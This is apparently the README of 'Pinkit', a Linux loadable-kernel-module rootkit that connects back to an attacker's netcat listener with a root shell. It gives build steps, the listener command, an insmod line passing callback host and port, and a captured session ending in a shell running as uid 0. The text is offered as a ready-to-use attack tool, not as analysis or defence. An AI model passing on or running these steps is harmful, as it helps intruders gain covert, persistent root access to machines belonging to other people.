
A quick LKM rootkit that executes a reverse TCP netcat shell with root privileges.

# Pinkit
A quick LKM rootkit that executes a reverse netcat shell with root privileges.

apt install build-essential linux-headers-$(uname -r)

[Compile Kernel Module]
cd Pinkit; make

[Execute Reverse Shell]
# nc must be installed
nc -lvp 1339 <- Run netcat listener in another shell

[Insert and remove LKM]
[root@Dev Pinkit]# insmod pinkit.ko host="REV_TCP_LH=" port="REV_TCP_LP=1339"
[root@Dev Pinkit]# cat /proc/modules |grep pink
pinkit 16384 0 - Live 0xffffffffc0aa6000 (PO)
[root@Dev Pinkit]# rmmod pinkit

[Once LKM is loaded shell will connect to nc listener]
-> ncat -lvp 1339
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::1339
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
sh: cannot set terminal process group (-1): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root)